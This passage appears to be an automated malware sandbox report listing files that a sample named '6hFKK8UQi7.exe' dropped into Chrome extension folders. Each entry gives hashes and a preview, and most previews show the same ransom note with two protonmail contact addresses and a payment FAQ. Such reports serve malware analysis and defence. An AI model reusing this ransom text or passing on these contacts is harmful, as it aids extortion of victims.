                  Preview: @q.....FE....M..hB.S....v.3.l..3F..gD..o...,..E....*.W.R1..0.w*G8.....gt...w...QV....9..?4...Y.D.~....A...O...w..0,r..j......M.U.%.u.V..c.....ES.7.7.^...j}....].E.]Q.....o...8.M/C...N.......o>...#.........t.tl4.z*..SaY..5.2.8.D....>9...#.o..OI........t...E6.0....#Op.etb........'..l$...%......"...P.r[.J.b....O...qB).GS./.}..|.......;.x,T.FV..NV..2.hG...T..,...9..jT..2z.wE..T..E?P..:.cDD...m.G$".]..f.Y..`..aCO.....B..1.Z.o\...O.gww..C...g....a$u......1Ly..C..E.9.....f.l...U....n...B.F..%....I.Q}=.,gd...........J.s.NYS.....U....a.7$:....`...a:S...aw.I...;....B.2.W..Q2E..{.v....J.x@......[?{.I.yhq...L.....LVZ?..N..Ju.h....+... ....K..?&"..t....9.....'3.B.....a(.1.m.U..a..Hw$)Gh..U..M...u.*.k..,...Hh.p.....w..|..1..J....k...r.._$.8d.N`zV.$..ajY..vg.>..,.#Aw...D...#D...t.1...g.V..Cp.AO.#..8`..../..F...h.b2.....C.#..a..!z..t.h.....|)..A..l....U...p.....o...c...a.&.l..]P..`.Z.._.IK.......N. .%..w!M..c.*j..."2..zZ.@[f.....xz.%.;>.q....X8j....5.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\af\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\am\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ar\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\az\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\be\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\bg\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\bn\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ca\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\cs\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\cy\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\da\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\de\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\el\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\en\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\es\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\et\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\eu\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\fa\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\fi\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
